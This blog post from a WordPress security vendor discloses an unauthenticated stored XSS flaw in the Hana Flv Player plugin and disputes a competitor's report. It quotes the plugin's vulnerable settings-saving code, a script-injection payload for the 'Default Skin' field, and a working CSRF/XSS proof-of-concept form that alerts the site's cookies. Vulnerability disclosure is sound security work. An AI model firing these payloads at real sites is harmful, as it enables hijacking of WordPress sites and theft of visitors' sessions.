Login
21 Jun 2021

WPScan Misses Real Serious Vulnerability in WordPress Plugin Hana Flv Player While Spreading False Claim of Vulnerability

Recently one of our competitors in the WordPress plugin vulnerability space, WPScan, released a report claiming there was an authenticated stored cross-site scripting (XSS) vulnerability in the plugin Hana Flv Player. At first glance it appears like a lot of false reports they include in their data, but further checking showed that while the claimed vulnerability didn’t exist, there was really an even more serious vulnerability in the relevant code. As of our posting this, the plugin is still available in WordPress’ plugin directory despite that.

Their report of an “authenticated stored cross-site scripting (XSS) vulnerability” starts with this past tense claim:

The plugin was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) vulnerability within the “Default Skin” field.

Though confusingly they then claim there is “[n]o known fix”. So was it vulnerable, or is it still vulnerable?

The only other details provided of the supposed vulnerability is this proof of concept:

Step1: Install and activate the plugin.

Step2: Go to the plugin setting.

Step3: Enter the following payload in the field “Default Skin”

xss”></td></tr></table><script>alert(1)</script><input type=’text’ name=”hflv_skin” value=”xss

Step4: Now the script is stored and whenever the user goes to the plugin the script will be executed.

What is being described there is a common scenario with false reports of vulnerabilities, as you have people who don’t understand the WordPress security model and don’t understand that high-level users have the capability to do the equivalent XSS. WPScan should understand that, but this report would say otherwise. WPScan claimed to have verified this.

You can easily check and see that the plugin’s settings page is only accessible to Administrators, who have that capability, so what is being described isn’t a vulnerability. Checking the underlying code confirms this, as only users with the manage_options capability, which only Administrators have, can access the page:

158

if ( $wp_version < 2 ) $capability=8; else $capability='manage_options'; add_options_page($this->admin_setting_title,$this->admin_setting_menu, $capability, __FILE__,array(&$this,'hana_flv_options_page'));

There could still be a different, less serious vulnerability there, if the plugin doesn’t properly protect against cross-site request forgery (CSRF) when saving the plugin’s settings. In this situation it was easy to confirm that was the case, but looking at the underlying code, it gets worse, as you don’t even have to be logged in to WordPress to save the plugin’s setting, which combined with what you can change, is a persistent cross-site scripting (XSS) vulnerability. That is something that hackers would be much more likely to be exploiting, then the vulnerability WPScan claimed existed.

In the plugin’s main file, the function hana_flv_options_update() will run if the POST input “hflv_player” is sent with a request to the website when the plugin is active:

2027
2028
2029

if ( isset($_POST['hflv_player']) ) {
	$hana_flv->hana_flv_options_update();
}

That function save’s the plugin’s setting without doing any security checks:

1538
1539
1540
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
1577
1578
1579
1580
1581
1582
1583
1584
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599
1600
1601
1602
1603
1604
1605
1606
1607

function hana_flv_options_update(){
 
	if ( isset($_POST['hflv_player']) ) {
		if ( is_numeric($_POST['hflv_player']) ){
			$this->user_attr['player'] = $_POST['hflv_player'];
		}
	}
 
	if ( isset($_POST['hflv_width']) ) {
		if ( is_numeric($_POST['hflv_width']) )
			$this->user_attr['width'] = $_POST['hflv_width'];
	}
 
	if ( isset($_POST['hflv_height']) ) {
		if ( $_POST['hflv_height']=='' || is_numeric($_POST['hflv_height']) || $_POST['hflv_height']=='auto' || $_POST['hflv_height']=='autow' )
			$this->user_attr['height'] = $_POST['hflv_height'];
	}
 
	if ( isset($_POST['hflv_autoplay']) ) {
		if ($_POST['hflv_autoplay'] =='true' || $_POST['hflv_autoplay'] =='false' )
			$this->user_attr['autoplay'] = $_POST['hflv_autoplay'];
	}
 
	if ( isset($_POST['hflv_loop']) ) {
		if ($_POST['hflv_loop'] =='true' || $_POST['hflv_loop'] =='false' )
			$this->user_attr['loop'] = $_POST['hflv_loop'];
	}
 
	if ( isset($_POST['hflv_autorewind']) ) {
		if ($_POST['hflv_autorewind'] =='true' || $_POST['hflv_autorewind'] =='false' )
			$this->user_attr['autorewind'] = $_POST['hflv_autorewind'];
	}
 
	if ( isset($_POST['hflv_autoload']) ) {
		if ($_POST['hflv_autoload'] =='true' || $_POST['hflv_autoload'] =='false' )
			$this->user_attr['autoload'] = $_POST['hflv_autoload'];
	}
	if ( isset($_POST['hflv_event_tracking']) ) {
		if ($_POST['hflv_event_tracking'] =='yes' || $_POST[hflv_event_tracking] =='no' )
			$this->user_attr['event_tracking'] = $_POST['hflv_event_tracking'];
	}
 
	if ( isset($_POST['hflv_more_2']) ) {			
			$this->user_attr['more_2'] = str_replace("\\",'',$_POST['hflv_more_2']);
	}
	if ( isset($_POST['hflv_more_3']) ) {
			$this->user_attr['more_3'] = str_replace("\\",'',$_POST['hflv_more_3']);
	}
	if ( isset($_POST['hflv_more_4']) ) {
			$this->user_attr['more_4'] = str_replace("\\",'',$_POST['hflv_more_4']);
	}
 
	if ( isset($_POST['hflv_more_4']) ) {
			$this->user_attr['flow3key'] = str_replace("\\",'',$_POST['flow3key']);
	}
	if ( isset($_POST['hflv_more_5']) ) {
			$this->user_attr['more_5'] = str_replace("\\",'',$_POST['hflv_more_5']);
	}
	if ( isset($_POST['hflv_skin']) ) {
			$this->user_attr['skin'] = str_replace("\\",'',$_POST['hflv_skin']);
	}
 
	//print_r ($this->user_attr);
 
	update_option('hanaflv_options',$this->user_attr);
	//$this->user_attr = get_option('hanaflv_options');
 
	$this->update_result="Settings are updated";
 
}

Because of a lack sanitization, validation, and or escaping JavaScript could be set to settings and then run, as confirmed with the proof of concept below.

Patchstack Too

Not to be left out, another data provider, Patchstack, which looks to include WPScan’s data without doing proper due diligence, also included the fake vulnerability claim in their data.

WordPress Causes Full Disclosure

Because of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.) You can notify the developer of this issue on the forum as well. Hopefully, the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box on the page /wp-admin/options-general.php?page=hana-flv-player%2Fhana-flv-player.php.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/" method="POST">
<input type="hidden" name="hflv_player" value="1" />
<input type="hidden" name="hflv_skin" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>

No related posts.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Plugin Security Scorecard Grade for Patchstack

Checked on March 5, 2025
D

See issues causing the plugin to get less than A+ grade

Plugin Security Scorecard Grade for WPScan

Checked on April 12, 2025
F

See issues causing the plugin to get less than A+ grade

Leave a Reply

Your email address will not be published.